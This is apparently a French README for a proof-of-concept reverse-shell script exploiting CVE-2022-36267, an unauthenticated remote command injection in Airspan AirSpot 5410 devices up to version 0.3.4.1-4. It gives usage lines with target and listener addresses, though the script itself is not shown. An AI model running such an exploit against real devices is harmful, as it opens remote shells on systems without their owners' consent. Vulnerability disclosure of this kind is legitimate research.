
Script PoC pour CVE-2022-36267 : Exploite une vulnérabilité d'injection de commande à distance non authentifiée dans l'antenne Airspan AirSpot 5410.
Ce dépôt contient un script de shell inverse Proof of Concept (PoC) pour exploiter CVE-2022-36267, une vulnérabilité critique dans les appareils Airspan AirSpot 5410. Le script est une démonstration pratique, complétant l'analyse approfondie fournie dans l'article de blog « Airspan AirSpot 5410 - Rapport de vulnérabilité ».
Tous les appareils Airspan AirSpot 5410 à partir de la version 0.3.4.1-4 et inférieure.
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

UNIQUEMENT À DES FINS ÉDUCATIVES.